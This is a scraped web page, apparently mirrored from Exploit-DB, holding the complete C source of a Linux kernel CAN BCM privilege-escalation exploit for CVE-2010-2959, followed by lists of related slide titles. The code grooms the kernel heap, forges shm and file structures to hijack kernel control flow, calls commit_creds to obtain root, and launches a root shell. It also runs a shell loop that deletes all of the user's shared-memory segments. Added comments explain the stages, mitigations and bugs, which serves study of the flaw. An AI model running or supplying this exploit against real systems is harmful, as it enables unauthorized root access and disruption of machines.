Linux Kernel < 2.6.36-rc1 CAN BCM Privilege Escalation Exploit                                 http://www.exploit-db.com/exploits/14814/



            Linux Kernel < 2.6.36-rc1 CAN BCM Privilege Escalation Exploit

                  EDB-ID: 14814         CVE: 2010-2959         OSVDB-ID: N/A
                  Author: Jon Oberheide Published: 2010-08-27 Verified:
                  Exploit Code:         Vulnerable App: N/A




          /*
           * i-CAN-haz-MODHARDEN.c
           *
           * Linux Kernel < 2.6.36-rc1 CAN BCM Privilege Escalation Exploit
           * Jon Oberheide <jon@oberheide.org>
           * http://jon.oberheide.org
           *
           * Information:
           *
           *      http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2959
           *
           *      Ben Hawkes discovered an integer overflow in the Controller Area Network
           *      (CAN) subsystem when setting up frame content and filtering certain
           *      messages. An attacker could send specially crafted CAN traffic to crash
           *      the system or gain root privileges.
           *
           * Usage:
           *
           *      $ gcc i-can-haz-modharden.c -o i-can-haz-modharden
           *      $ ./i-can-haz-modharden
           *      ...
           *      [+] launching root shell!
           *      # id
           *      uid=0(root) gid=0(root)
           *
           * Notes:
           *
           *      The allocation pattern of the CAN BCM module gives us some desirable
           *      properties for smashing the SLUB. We control the kmalloc with a 16-byte
           *      granularity allowing us to place our allocation in the SLUB cache of our
           *      choosing (we'll use kmalloc-96 and smash a shmid_kernel struct for
           *      old-times sake). The allocation can also be made in its own discrete
           *      stage before the overwrite which allows us to be a bit more conservative
           *      in ensuring the proper layout of our SLUB cache.
           *
           *      To exploit the vulnerability, we first create a BCM RX op with a crafted
           *      nframes to trigger the integer overflow during the kmalloc. On the second
           *      call to update the existing RX op, we bypass the E2BIG check since the
           *      stored nframes in the op is large, yet has an insufficiently sized
           *      allocation associated with it. We then have a controlled write into the
           *      adjacent shmid_kernel object in the 96-byte SLUB cache.
           *
           *      However, while we control the length of the SLUB overwrite via a
           *      memcpy_fromiovec operation, there exists a memset operation that directly
           *      follows which zeros out last_frames, likely an adjacent allocation, with
           *      the same malformed length, effectively nullifying our shmid smash. To
           *      work around this, we take advantage of the fact that copy_from_user can
           *      perform partial writes on x86 and trigger an EFAULT by setting up a
           *      truncated memory mapping as the source for the memcpy_fromiovec operation,
           *      allowing us to smash the necessary amount of memory and then pop out and
           *      return early before the memset operation occurs.
           *
           *      We then perform a dry-run and detect the shmid smash via an EIDRM errno
           *      from shmat() caused by an invalid ipc_perm sequence number. Once we're
           *      sure we have a shmid_kernel under our control we re-smash it with the
           *      malformed version and redirect control flow to our credential modifying
           *      calls mapped in user space.
           *
           *      Distros: please use grsecurity's MODHARDEN or SELinux's module_request
           *      to restrict unprivileged loading of uncommon packet families. Allowing




          *     the loading of poorly-written PF modules just adds a non-trivial and
          *     unnecessary attack surface to the kernel.
          *
          *     Targeted for 32-bit Ubuntu Lucid 10.04 (2.6.32-21-generic), but ports
          *     easily to other vulnerable kernels/distros. Careful, it could use some
          *     post-exploitation stability love as well.
          *
          *     Props to twiz, sgrakkyu, spender, qaaz, and anyone else I missed that
          *     this exploit borrows code from.
          */
         #include <stdio.h>
         #include <stdlib.h>
         #include <stdint.h>
         #include <string.h>
         #include <unistd.h>
         #include <errno.h>
         #include <fcntl.h>
         #include <limits.h>
         #include <inttypes.h>
         #include <sys/types.h>
         #include <sys/socket.h>
         #include <sys/ipc.h>
         #include <sys/shm.h>
         #include <sys/mman.h>
         #include <sys/stat.h>
         #define SLUB "kmalloc-96"
         #define ALLOCATION 96
         #define FILLER 100
         #ifndef PF_CAN
         #define PF_CAN 29
         #endif
         #ifndef CAN_BCM
         #define CAN_BCM 2
         #endif
         /*
          * Minimal user-space copy of the kernel's struct sockaddr_can, declared
          * locally so the program builds without the CAN headers. trigger() zeroes
          * it and sets only can_family before connect().
          */
         struct sockaddr_can {
               sa_family_t can_family;
               int can_ifindex;
               union {
                   struct { uint32_t rx_id, tx_id; } tp;
               } can_addr;
         };
         /*
          * Local copy of the CAN frame layout. With the aligned(8) data field this
          * is 16 bytes, which is the per-frame multiplier (CFSIZ) in the size
          * computation (nframes * CFSIZ) that overflows in the vulnerable BCM code.
          */
         struct can_frame {
               uint32_t can_id;
               uint8_t can_dlc;
               uint8_t data[8] __attribute__((aligned(8)));
         };
         /*
          * Header that prefixes every message on a BCM socket. nframes is the
          * user-controlled frame count that the vulnerable kernel multiplied by
          * CFSIZ without an overflow check (CVE-2010-2959); the 2.6.36-rc1 fix
          * rejects oversized nframes before the allocation is sized.
          */
         struct bcm_msg_head {
               uint32_t opcode;
               uint32_t flags;
               uint32_t count;
               struct timeval ival1, ival2;
               uint32_t can_id;
               uint32_t nframes;
               /* zero-length trailing array (GNU extension): frames follow the header in the same buffer */
               struct can_frame frames[0];
         };
         #define RX_SETUP 5
         #define RX_DELETE 6
         #define CFSIZ sizeof(struct can_frame)
         #define MHSIZ sizeof(struct bcm_msg_head)
         #define IPCMNI 32768
         #define EIDRM 43
         #define HDRLEN_KMALLOC 8
         /*
          * Kernel-style doubly linked list node. The forged kernel structures
          * below embed it; setup() points next/prev at the node itself so each
          * list reads as empty.
          */
         struct list_head {
               struct list_head *next;
               struct list_head *prev;
         };
         /*
          * User-space replica of the targeted kernel's struct super_block (32-bit
          * 2.6.32-21-generic per the header). The trailing declarator defines a
          * global instance that the forged inode points at; setup() initializes
          * only s_flags. Field order and sizes must match the target build exactly,
          * which is why this payload is kernel-version specific.
          */
         struct super_block {
               struct list_head s_list;
               unsigned int s_dev;
               unsigned long s_blocksize;
               unsigned char s_blocksize_bits;
               unsigned char s_dirt;
               uint64_t s_maxbytes;
               void *s_type;
               void *s_op;
               void *dq_op;
               void *s_qcop;
               void *s_export_op;
               unsigned long s_flags;
         } super_block;
         /*
          * Replica of the kernel mutex layout for the target build. setup() sets
          * count = 1 on the forged inode's inotify_mutex (1 is the unlocked state
          * in that kernel's mutex implementation).
          */
         struct mutex {
               unsigned int count;
               unsigned int wait_lock;
               struct list_head wait_list;
               void *owner;
          };
         /*
          * Replica of the target kernel's struct inode. A global instance is
          * defined here and wired up in setup(): i_size, i_sb -> super_block, an
          * empty inotify_watches list and an unlocked inotify_mutex. Everything
          * else stays zero. Layout must match the target build exactly.
          */
         struct inode {
               struct list_head i_hash;
               struct list_head i_list;
               struct list_head i_sb_list;
               struct list_head i_dentry_list;
               unsigned long i_ino;
               unsigned int i_count;
               unsigned int i_nlink;
               unsigned int i_uid;
               unsigned int i_gid;
               unsigned int i_rdev;
               uint64_t i_version;
               uint64_t i_size;
               unsigned int i_size_seqcount;
               long i_atime_tv_sec;
               long i_atime_tv_nsec;
               long i_mtime_tv_sec;
               long i_mtime_tv_nsec;
               long i_ctime_tv_sec;
               long i_ctime_tv_nsec;
               uint64_t i_blocks;
               unsigned int i_blkbits;
               unsigned short i_bytes;
               unsigned short i_mode;
               unsigned int i_lock;
               struct mutex i_mutex;
               unsigned int i_alloc_sem_activity;
               unsigned int i_alloc_sem_wait_lock;
               struct list_head i_alloc_sem_wait_list;
               void *i_op;
               void *i_fop;
               struct super_block *i_sb;
               void *i_flock;
               void *i_mapping;
               char i_data[84];   /* opaque filler standing in for the embedded address_space */
               void *i_dquot_1;
               void *i_dquot_2;
               struct list_head i_devices;
               void *i_pipe_union;
               unsigned int i_generation;
               unsigned int i_fsnotify_mask;
               void *i_fsnotify_mark_entries;
               struct list_head inotify_watches;
               struct mutex inotify_mutex;
         } inode;
         /*
          * Replica of the target kernel's struct dentry. setup() gives the global
          * instance a large d_count/d_flags, no parent, and points d_inode at the
          * forged inode.
          */
         struct dentry {
               unsigned int d_count;
               unsigned int d_flags;
               unsigned int d_lock;
               int d_mounted;
               void *d_inode;
               struct list_head d_hash;
               void *d_parent;
         } dentry;
         /*
          * Replica of the target kernel's struct file_operations. setup() points
          * mmap and get_unmapped_area at kernel_code(), so that when the kernel
          * services shmat() on the corrupted segment it calls a function in user
          * memory with kernel privileges. That user-to-kernel transition is the
          * class of behaviour SMEP and similar user/kernel separation mitigations
          * were later introduced to block. All other slots stay NULL.
          */
         struct file_operations {
               void *owner;
               void *llseek;
               void *read;
               void *write;
               void *aio_read;
               void *aio_write;
               void *readdir;
               void *poll;
               void *ioctl;
               void *unlocked_ioctl;
               void *compat_ioctl;
               void *mmap;
               void *open;
               void *flush;
               void *release;
               void *fsync;
               void *aio_fsync;
               void *fasync;
               void *lock;
               void *sendpage;
               void *get_unmapped_area;
               void *check_flags;
               void *flock;
               void *splice_write;
               void *splice_read;
               void *setlease;
         } op;
         /*
          * Replica of the target kernel's struct vfsmount. setup() initializes
          * mnt_flags = 0 and mnt_count = 1 on the global instance. struct
          * mnt_namespace is never defined in this file; a pointer to an incomplete
          * type is enough since the field only contributes to the layout.
          */
         struct vfsmount {
               struct list_head mnt_hash;
               void *mnt_parent;
               void *mnt_mountpoint;
               void *mnt_root;
               void *mnt_sb;
               struct list_head mnt_mounts;
               struct list_head mnt_child;
               int mnt_flags;
               const char *mnt_devname;
               struct list_head mnt_list;
               struct list_head mnt_expire;
               struct list_head mnt_share;
               struct list_head mnt_slave_list;
               struct list_head mnt_slave;
               struct vfsmount *mnt_master;
               struct mnt_namespace *mnt_ns;
               int mnt_id;
               int mnt_group_id;
               int mnt_count;
         } vfsmount;
         /*
          * Replica of the target kernel's struct file. The forged shmid_kernel's
          * shm_file points at this global instance, which setup() links to the
          * forged dentry, vfsmount and file_operations (f_op -> op).
          */
         struct file {
               struct list_head fu_list;
               struct vfsmount *f_vfsmnt;
               struct dentry *f_dentry;
               void *f_op;
               unsigned int f_lock;
               unsigned long f_count;
         } file;
         /*
          * Replica of the permission block at the head of every SysV IPC object.
          * shmat() validates seq against the sequence number encoded in the shmid
          * and fails with EIDRM on a mismatch; trigger() uses that error as its
          * corruption oracle and sets seq = shmid / IPCMNI on the forged object
          * before the second overwrite so the check passes.
          */
         struct kern_ipc_perm {
               unsigned int lock;
               int deleted;
               int id;
               unsigned int key;
               unsigned int uid;
               unsigned int gid;
               unsigned int cuid;
               unsigned int cgid;
               unsigned int mode;
               unsigned int seq;
               void *security;
         };
         /*
          * Replica of the target kernel's struct shmid_kernel, the kmalloc-96
          * object that the undersized BCM allocation ends up next to. The global
          * instance is the payload written over the neighbouring segment; setup()
          * fills shm_perm with the caller's uid/gid and a permissive mode and
          * points shm_file at the forged file.
          */
         struct shmid_kernel {
               struct kern_ipc_perm shm_perm;
               struct file *shm_file;
               unsigned long shm_nattch;
               unsigned long shm_segsz;
               time_t shm_atim;
               time_t shm_dtim;
               time_t shm_ctim;
               unsigned int shm_cprid;
               unsigned int shm_lprid;
               void *mlock_user;
         } shmid_kernel;
         /*
          * Function-pointer types for the kernel's credential helpers. regparm(3)
          * matches the 32-bit x86 kernel's internal calling convention. The two
          * globals are filled in by setup() from /proc/kallsyms and called from
          * kernel_code() while it runs in kernel context.
          */
         typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
         typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
         _commit_creds commit_creds;
         _prepare_kernel_cred prepare_kernel_cred;
         /*
          * Payload executed in kernel context once the forged file_operations
          * pointer is dispatched. prepare_kernel_cred(0) builds a fresh root
          * credential set and commit_creds() installs it on the calling task.
          * Both arguments are unused. The -1 return is an error code, presumably so
          * the kernel backs out of the forged mapping instead of continuing with it.
          */
         int __attribute__((regparm(3)))
         kernel_code(struct file *file, void *vma)
         {
               commit_creds(prepare_kernel_cred(0));
               return -1;
         }
         /*
          * Resolve a kernel symbol address by scanning /proc/kallsyms, falling
          * back to the older /proc/ksyms format. Returns the address, or 0 when
          * neither file can be opened or the name is not found. This step relies
          * on those files being readable by unprivileged users; kptr_restrict
          * (2.6.38+) and similar hardening hide kernel addresses from them, which
          * is the intended defence against it.
          *
          * NOTE(review): throughout this listing a trailing "n" inside string
          * literals ("%sn", "...%pn") and the '0' character literal below are the
          * extraction's rendering of "\n" and '\0'; they are left as found here.
          * NOTE(review): oldstyle is only assigned on the /proc/ksyms fallback, so
          * it is read uninitialized when /proc/kallsyms opens successfully.
          */
         unsigned long
         get_symbol(char *name)
         {
               FILE *f;
               unsigned long addr;
               char dummy;
               char sname[512];
               int ret = 0, oldstyle;
               f = fopen("/proc/kallsyms", "r");
               if (f == NULL) {
                   f = fopen("/proc/ksyms", "r");
                   if (f == NULL)
                          return 0;
                   oldstyle = 1;
               }
               while (ret != EOF) {
                   if (!oldstyle) {
                          /* kallsyms line: "<addr> <type> <name>". Scanning %p into an
                           * unsigned long assumes sizeof(void *) == sizeof(unsigned long),
                           * which holds on the 32-bit target. */
                          ret = fscanf(f, "%p %c %sn", (void **) &addr, &dummy, sname);
                   } else {
                          /* ksyms line: "<addr> <name>" */
                          ret = fscanf(f, "%p %sn", (void **) &addr, sname);
                          if (ret == 2) {
                              char *p;
                              /* skip entries containing "_O/" or "_S." (presumably module-qualified names) */
                              if (strstr(sname, "_O/") || strstr(sname, "_S.")) {
                                  continue;
                              }
                              /* strip a trailing "_smp"-style suffix, including the underscores before it */
                              p = strrchr(sname, '_');
                              if (p > ((char *) sname + 5) && !strncmp(p - 3, "smp", 3)) {
                                  p = p - 4;
                                  while (p > (char *)sname && *(p - 1) == '_') {
                                         p--;
                                  }
                                  *p = '0';
                              }
                          }
                   }
                   if (ret == 0) {
                          /* unparsable line: consume one token and keep going */
                          fscanf(f, "%sn", sname);
                          continue;
                   }
                   if (!strcmp(name, sname)) {
                          printf("[+] resolved symbol %s to %pn", name, (void *) addr);
                          fclose(f);
                          return addr;
                   }
               }
               fclose(f);
               return 0;
         }
         /*
          * Look up the row named `cache` in /proc/slabinfo and return its free
          * object count (num_objs - active_objs), optionally writing the raw counts
          * through active_out / total_out. Exits the process if /proc/slabinfo
          * cannot be opened. A world-readable slabinfo is what makes the heap
          * layout observable from user space here; later kernels restrict the file
          * to root for exactly this reason.
          *
          * NOTE(review): the search loop has no EOF check. If `cache` never appears,
          * fgets() fails at EOF, the stale buffer is re-parsed and the loop never
          * terminates. active/total are also uninitialized until a line parses.
          */
         int
         check_slabinfo(char *cache, int *active_out, int *total_out)
         {
               FILE *fp;
               char name[64], slab[256];
               int active, total, diff;
               memset(slab, 0, sizeof(slab));
               memset(name, 0, sizeof(name));
               fp = fopen("/proc/slabinfo", "r");
               if (!fp) {
                   printf("[-] sorry, /proc/slabinfo is not available!");
                   exit(1);
               }
               /* skip the first line (the slabinfo version banner) */
               fgets(slab, sizeof(slab) - 1, fp);
               while (1) {
                   fgets(slab, sizeof(slab) - 1, fp);
                   /* columns: name <active_objs> <num_objs> ... */
                   sscanf(slab, "%s %u %u", name, &active, &total);
                   diff = total - active;
                   if (strcmp(name, cache) == 0) {
                       break;
                   }
               }
               fclose(fp);
               if (active_out) {
                   *active_out = active;
               }
               if (total_out) {
                   *total_out = total;
               }
               return diff;
         }
         /*
          * Drive the CAN BCM overflow end to end, following the stages described
          * in the header notes: open and connect a PF_CAN/CAN_BCM socket; register
          * an RX op whose nframes makes the kernel's size computation wrap to an
          * undersized kmalloc-96 object; groom kmalloc-96 with shm segments so a
          * shmid_kernel sits next to it; update the op from a deliberately
          * truncated mapping so the copy overruns into the neighbour and faults
          * before the following memset; find the clobbered segment via shmat()
          * reporting EIDRM; then repeat the overwrite with the forged shmid_kernel
          * and shmat() once more to dispatch kernel_code(). Every failure path
          * calls exit() and success exec()s a shell, so the function only returns
          * normally on the final "exploit failed" path.
          *
          * Defensive notes: each step depends on an unprivileged user being able
          * to auto-load the CAN BCM module via socket() (restrictable with
          * MODHARDEN / module_request policy, as the header asks), to read
          * /proc/slabinfo, and on the kernel calling a user-space function pointer
          * (blocked by SMEP-class mitigations on later systems).
          *
          * NOTE(review): after connect() the code tests sock rather than ret, so a
          * failed connect() is not detected. shmids is sized diff * 10 entries but
          * indices up to base + 2 * FILLER are written. sock_len, active_new and
          * total_new are never used.
          */
         void
         trigger(void)
         {
               int *shmids;
               int i, ret, sock, cnt, base, smashed;
               int diff, active, total, active_new, total_new;
               int len, sock_len, mmap_len;
               struct sockaddr_can addr;
               struct bcm_msg_head *msg;
               void *efault;
               char *buf;
               /* socket() on an uncommon family triggers the module auto-load the header's MODHARDEN note refers to */
               printf("[+] creating PF_CAN socket...n");
               sock = socket(PF_CAN, SOCK_DGRAM, CAN_BCM);
               if (sock < 0) {
                   printf("[-] kernel lacks CAN packet family supportn");
                   exit(1);
               }
               printf("[+] connecting PF_CAN socket...n");
               memset(&addr, 0, sizeof(addr));
               addr.can_family = PF_CAN;
               ret = connect(sock, (struct sockaddr *) &addr, sizeof(addr));
               if (sock < 0) {
                   printf("[-] could not connect CAN socketn");
                   exit(1);
               }
               /* a message carrying ALLOCATION / 16 = 6 frames */
               len = MHSIZ + (CFSIZ * (ALLOCATION / 16));
               msg = malloc(len);
               memset(msg, 0, len);
               msg->can_id = 2959;   /* arbitrary id, presumably a nod to the CVE number */
               /* nframes * CFSIZ wraps past UINT_MAX to exactly ALLOCATION (96) bytes, so the
                * kernel allocates a kmalloc-96 object while storing the huge nframes */
               msg->nframes = (UINT_MAX / CFSIZ) + (ALLOCATION / 16) + 1;
               printf("[+] clearing out any active OPs via RX_DELETE...n");
               msg->opcode = RX_DELETE;
               ret = send(sock, msg, len, 0);
               /* destructive: removes every shm segment this user owns, not only ours */
               printf("[+] removing any active user-owned shmids...n");
               system("for shmid in `cat /proc/sysvipc/shm | awk '{print $2}'`; do ipcrm -m $shmid > /dev/null 2>&1; done;");
               printf("[+] massaging " SLUB " SLUB cache with dummy allocationsn");
               /* fill the free slots of kmalloc-96 with shm segments until slabinfo reports none free */
               diff = check_slabinfo(SLUB, &active, &total);
               shmids = malloc(sizeof(int) * diff * 10);
               cnt = diff * 10;
               for (i = 0; i < cnt; ++i) {
                   diff = check_slabinfo(SLUB, &active, &total);
                   if (diff == 0) {
                       break;
                   }
                   shmids[i] = shmget(IPC_PRIVATE, 1024, IPC_CREAT);
               }
               base = i;
               if (diff != 0) {
                   printf("[-] inconsistency detected with SLUB cache allocation, please try againn");
                   exit(1);
               }
               printf("[+] corrupting BCM OP with truncated allocation via RX_SETUP...n");
               /* FILLER segments before and after the BCM allocation so it is surrounded by shmid_kernel objects */
               i = base;
               cnt = i + FILLER;
               for (; i < cnt; ++i) {
                   shmids[i] = shmget(IPC_PRIVATE, 1024, IPC_CREAT);
               }
               msg->opcode = RX_SETUP;
               ret = send(sock, msg, len, 0);
               if (ret < 0) {
                   printf("[-] kernel rejected malformed CAN headern");
                   exit(1);
               }
               i = base + FILLER;
               cnt = i + FILLER;
               for (; i < cnt; ++i) {
                   shmids[i] = shmget(IPC_PRIVATE, 1024, IPC_CREAT);
               }
               printf("[+] mmap'ing truncated memory to short-circuit/EFAULT the memcpy_fromiovec...n");
               /* the update message is shorter than nframes * CFSIZ implies; per the header
                * notes the kernel's copy from user space faults part-way and returns
                * EFAULT before the memset that would otherwise re-zero the neighbour */
               mmap_len = MHSIZ + (CFSIZ * (ALLOCATION / 16) * 3);
               sock_len = MHSIZ + (CFSIZ * (ALLOCATION / 16) * 4);
               efault = mmap(NULL, mmap_len, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
               printf("[+] mmap'ed mapping of length %d at %pn", mmap_len, efault);
               printf("[+] smashing adjacent shmid with dummy payload via malformed RX_SETUP...n");
               msg = (struct bcm_msg_head *) efault;
               memset(msg, 0, mmap_len);
               msg->can_id = 2959;
               msg->nframes = (ALLOCATION / 16) * 4;
               msg->opcode = RX_SETUP;
               ret = send(sock, msg, mmap_len, 0);
               if (ret != -1 && errno != EFAULT) {
                   printf("[-] couldn't trigger EFAULT, exploit aborting!n");
                   exit(1);
               }
               /* dry run: the zeroed overwrite breaks the neighbour's ipc_perm.seq, so
                * shmat() on that segment fails with EIDRM — the corruption oracle */
               printf("[+] seeking out the smashed shmid_kernel...n");
               i = base;
               cnt = i + FILLER + FILLER;
               for (; i < cnt; ++i) {
                   ret = (int) shmat(shmids[i], NULL, SHM_RDONLY);
                   if (ret == -1 && errno == EIDRM) {
                       smashed = i;
                       break;
                   }
               }
               if (i == cnt) {
                   printf("[-] could not find smashed shmid, trying running the exploit again!n");
                   exit(1);
               }
               printf("[+] discovered our smashed shmid_kernel at shmid[%d] = %dn", i, shmids[i]);
               printf("[+] re-smashing the shmid_kernel with exploit payload...n");
               /* give the forged object the sequence number shmat() expects for this id,
                * then place it at the offset where the neighbour was hit (HDRLEN_KMALLOC
                * presumably accounts for allocator metadata — confirm against the target) */
               shmid_kernel.shm_perm.seq = shmids[smashed] / IPCMNI;
               buf = (char *) msg;
               memcpy(&buf[MHSIZ + (ALLOCATION * 2) + HDRLEN_KMALLOC], &shmid_kernel, sizeof(shmid_kernel));
               msg->opcode = RX_SETUP;
               ret = send(sock, msg, mmap_len, 0);
               if (ret != -1 && errno != EFAULT) {
                   printf("[-] couldn't trigger EFAULT, exploit aborting!n");
                   exit(1);
               }
               /* shmat() on the forged segment dispatches through file->f_op into
                * kernel_code(); anything other than EIDRM means the credentials were swapped */
               ret = (int) shmat(shmids[smashed], NULL, SHM_RDONLY);
               if (ret == -1 && errno != EIDRM) {
                   setresuid(0, 0, 0);
                   setresgid(0, 0, 0);
                   printf("[+] launching root shell!n");
                   execl("/bin/bash", "/bin/bash", NULL);
                   exit(0);
               }
               printf("[-] exploit failed! retry?n");
         }
         /*
          * Resolve the two credential helpers and build the forged kernel objects
          * the overwrite will plant: a shmid_kernel whose shm_file chain
          * (file -> dentry / vfsmount / file_operations) is consistent enough for
          * shmat() to reach f_op->mmap, which points at kernel_code(). The
          * ipc_perm fields copy the caller's uid/gid so the permission check
          * passes before the dispatch.
          *
          * NOTE(review): a failed symbol lookup prints "aborting!" but does not
          * exit; commit_creds / prepare_kernel_cred stay NULL and kernel_code()
          * would call through them.
          */
         void
         setup(void)
         {
               printf("[+] looking for symbols...n");
               commit_creds = (_commit_creds) get_symbol("commit_creds");
               if (!commit_creds) {
                   printf("[-] symbol table not availabe, aborting!n");
               }
               prepare_kernel_cred = (_prepare_kernel_cred) get_symbol("prepare_kernel_cred");
               if (!prepare_kernel_cred) {
                   printf("[-] symbol table not availabe, aborting!n");
               }
               printf("[+] setting up exploit payload...n");
               super_block.s_flags = 0;
               inode.i_size = 4096;
               inode.i_sb = &super_block;
               /* empty list: next and prev point at the head itself */
               inode.inotify_watches.next = &inode.inotify_watches;
               inode.inotify_watches.prev = &inode.inotify_watches;
               inode.inotify_mutex.count = 1;   /* 1 == unlocked */
               dentry.d_count = 4096;
               dentry.d_flags = 4096;
               dentry.d_parent = NULL;
               dentry.d_inode = &inode;
               /* the control-flow hijack: both hooks shmat()'s mapping path may take */
               op.mmap = &kernel_code;
               op.get_unmapped_area = &kernel_code;
               vfsmount.mnt_flags = 0;
               vfsmount.mnt_count = 1;
               file.fu_list.prev = &file.fu_list;
               file.fu_list.next = &file.fu_list;
               file.f_dentry = &dentry;
               file.f_vfsmnt = &vfsmount;
               file.f_op = &op;
               shmid_kernel.shm_perm.key = IPC_PRIVATE;
               shmid_kernel.shm_perm.uid = getuid();
               shmid_kernel.shm_perm.gid = getgid();
               shmid_kernel.shm_perm.cuid = getuid();
               shmid_kernel.shm_perm.cgid = getgid();
               shmid_kernel.shm_perm.mode = -1;   /* all permission bits set */
               shmid_kernel.shm_file = &file;
         }
         /* Entry point: build the payload structures, then run the attack. argc/argv are unused. */
         int
         main(int argc, char **argv)
         {
               setup();
               trigger();
               return 0;
         }





 
Intel® RDT Hands-on Lab
Intel® RDT Hands-on LabIntel® RDT Hands-on Lab
Intel® RDT Hands-on LabMichelle Holley
 

Similar a Exploit access root to kernel 2.6.32 2.6.36 privilege escalation exploit (20)

Linux kernel-rootkit-dev - Wonokaerun
Linux kernel-rootkit-dev - WonokaerunLinux kernel-rootkit-dev - Wonokaerun
Linux kernel-rootkit-dev - Wonokaerun
 
Linux Integrity Mechanisms - Protecting Container Runtime as an example
Linux Integrity Mechanisms - Protecting Container Runtime as an exampleLinux Integrity Mechanisms - Protecting Container Runtime as an example
Linux Integrity Mechanisms - Protecting Container Runtime as an example
 
Advanced Evasion Techniques by Win32/Gapz
Advanced Evasion Techniques by Win32/GapzAdvanced Evasion Techniques by Win32/Gapz
Advanced Evasion Techniques by Win32/Gapz
 
BKK16-211 Internet of Tiny Linux (io tl)- Status and Progress
BKK16-211 Internet of Tiny Linux (io tl)- Status and ProgressBKK16-211 Internet of Tiny Linux (io tl)- Status and Progress
BKK16-211 Internet of Tiny Linux (io tl)- Status and Progress
 
Genode Compositions
Genode CompositionsGenode Compositions
Genode Compositions
 
Auditing the Opensource Kernels
Auditing the Opensource KernelsAuditing the Opensource Kernels
Auditing the Opensource Kernels
 
Exploiting Llinux Environment
Exploiting Llinux EnvironmentExploiting Llinux Environment
Exploiting Llinux Environment
 
Beagleboard xm-setup
Beagleboard xm-setupBeagleboard xm-setup
Beagleboard xm-setup
 
Summary of linux kernel security protections
Summary of linux kernel security protectionsSummary of linux kernel security protections
Summary of linux kernel security protections
 
Linux kernel debugging
Linux kernel debuggingLinux kernel debugging
Linux kernel debugging
 
Le Device Tree Linux
Le Device Tree LinuxLe Device Tree Linux
Le Device Tree Linux
 
Defcon 22 - Stitching numbers - generating rop payloads from in memory numbers
Defcon 22 - Stitching numbers - generating rop payloads from in memory numbersDefcon 22 - Stitching numbers - generating rop payloads from in memory numbers
Defcon 22 - Stitching numbers - generating rop payloads from in memory numbers
 
Defcon 27 - Writing custom backdoor payloads with C#
Defcon 27 - Writing custom backdoor payloads with C#Defcon 27 - Writing custom backdoor payloads with C#
Defcon 27 - Writing custom backdoor payloads with C#
 
Kernel Recipes 2015 - Kernel dump analysis
Kernel Recipes 2015 - Kernel dump analysisKernel Recipes 2015 - Kernel dump analysis
Kernel Recipes 2015 - Kernel dump analysis
 
Let's trace Linux Lernel with KGDB @ COSCUP 2021
Let's trace Linux Lernel with KGDB @ COSCUP 2021Let's trace Linux Lernel with KGDB @ COSCUP 2021
Let's trace Linux Lernel with KGDB @ COSCUP 2021
 
Attack your Trusted Core
Attack your Trusted CoreAttack your Trusted Core
Attack your Trusted Core
 
Sockets and Socket-Buffer
Sockets and Socket-BufferSockets and Socket-Buffer
Sockets and Socket-Buffer
 
ARM® Cortex™ M Bootup_CMSIS_Part_2_3
ARM® Cortex™ M Bootup_CMSIS_Part_2_3ARM® Cortex™ M Bootup_CMSIS_Part_2_3
ARM® Cortex™ M Bootup_CMSIS_Part_2_3
 
OMFW 2012: Analyzing Linux Kernel Rootkits with Volatlity
OMFW 2012: Analyzing Linux Kernel Rootkits with VolatlityOMFW 2012: Analyzing Linux Kernel Rootkits with Volatlity
OMFW 2012: Analyzing Linux Kernel Rootkits with Volatlity
 
Intel® RDT Hands-on Lab
Intel® RDT Hands-on LabIntel® RDT Hands-on Lab
Intel® RDT Hands-on Lab
 

Más de Carlos Eduardo

Criando plugin para o Nagios em Shell Script _ Nagios
Criando plugin para o Nagios em Shell Script _ NagiosCriando plugin para o Nagios em Shell Script _ Nagios
Criando plugin para o Nagios em Shell Script _ NagiosCarlos Eduardo
 
Iptables bridging and firewalling
Iptables bridging and firewallingIptables bridging and firewalling
Iptables bridging and firewallingCarlos Eduardo
 
Alterar nome do_domínio–rendom_win-2008_e_2003
Alterar nome do_domínio–rendom_win-2008_e_2003Alterar nome do_domínio–rendom_win-2008_e_2003
Alterar nome do_domínio–rendom_win-2008_e_2003Carlos Eduardo
 
Configuração dns memorial descritivo
Configuração dns   memorial descritivoConfiguração dns   memorial descritivo
Configuração dns memorial descritivoCarlos Eduardo
 
Additional resources repositories_rpm_forge - centos wiki
Additional resources repositories_rpm_forge - centos wikiAdditional resources repositories_rpm_forge - centos wiki
Additional resources repositories_rpm_forge - centos wikiCarlos Eduardo
 
Postfix amavisd connect to 127.0.0.1[127.0.0.1]-10024_ connection refused _...
Postfix amavisd   connect to 127.0.0.1[127.0.0.1]-10024_ connection refused _...Postfix amavisd   connect to 127.0.0.1[127.0.0.1]-10024_ connection refused _...
Postfix amavisd connect to 127.0.0.1[127.0.0.1]-10024_ connection refused _...Carlos Eduardo
 
Migrate linux user password to postfix vmail database
Migrate linux user password to postfix vmail databaseMigrate linux user password to postfix vmail database
Migrate linux user password to postfix vmail databaseCarlos Eduardo
 
Poppassd setup howto for rhel cent os 5 ‹‹ linux mail server setup and howto ...
Poppassd setup howto for rhel cent os 5 ‹‹ linux mail server setup and howto ...Poppassd setup howto for rhel cent os 5 ‹‹ linux mail server setup and howto ...
Poppassd setup howto for rhel cent os 5 ‹‹ linux mail server setup and howto ...Carlos Eduardo
 
Samsung r440 com wireless broadcom bcm4313 no ubuntu 11.10
Samsung r440 com wireless broadcom bcm4313 no ubuntu 11.10Samsung r440 com wireless broadcom bcm4313 no ubuntu 11.10
Samsung r440 com wireless broadcom bcm4313 no ubuntu 11.10Carlos Eduardo
 
How to root phones or tablets running android 2.3 gingerbread jailbreak an...
How to root phones or tablets running android 2.3 gingerbread    jailbreak an...How to root phones or tablets running android 2.3 gingerbread    jailbreak an...
How to root phones or tablets running android 2.3 gingerbread jailbreak an...Carlos Eduardo
 
Compartilhamento no samba com permissão de grupo
Compartilhamento no samba com permissão de grupoCompartilhamento no samba com permissão de grupo
Compartilhamento no samba com permissão de grupoCarlos Eduardo
 
Converting parallels or vm ware to virtual box
Converting parallels or vm ware to virtual boxConverting parallels or vm ware to virtual box
Converting parallels or vm ware to virtual boxCarlos Eduardo
 
Startup guide for kvm on cent os 6
Startup guide for kvm on cent os 6Startup guide for kvm on cent os 6
Startup guide for kvm on cent os 6Carlos Eduardo
 
Alterar memória kvm virtual machine
Alterar memória kvm virtual machineAlterar memória kvm virtual machine
Alterar memória kvm virtual machineCarlos Eduardo
 
